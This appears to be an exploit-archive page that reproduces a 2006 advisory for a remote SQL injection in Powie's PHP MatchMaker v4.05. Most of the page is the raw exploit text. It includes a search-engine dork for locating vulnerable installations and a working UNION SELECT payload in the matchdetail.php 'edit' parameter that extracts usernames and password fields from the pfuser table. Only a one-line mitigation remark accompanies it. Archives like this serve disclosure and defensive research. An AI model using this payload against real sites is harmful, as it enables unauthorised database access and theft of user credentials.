header-logo
Suggest Exploit
vendor:
PHP MatchMaker
by:
SHiKaA
N/A
CVSS
N/A
Remote SQL Injection
89
CWE
Product Name: PHP MatchMaker
Affected Version From: v4.05
Affected Version To: v4.05
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Powie’s PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'edit' of the 'matchdetail.php' script. This can be used to extract data from the database, modify data, delete data, or even execute administration operations on the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#==============================================================================================
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.powie.de    
#                                                                     
#Version : v4.05
#
#===============================================================================================
#
#DORK :  "Powie's PSCRIPT MatchMaker 4.05"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-11-17]

Navigation

Suggest Exploit

Services By CQR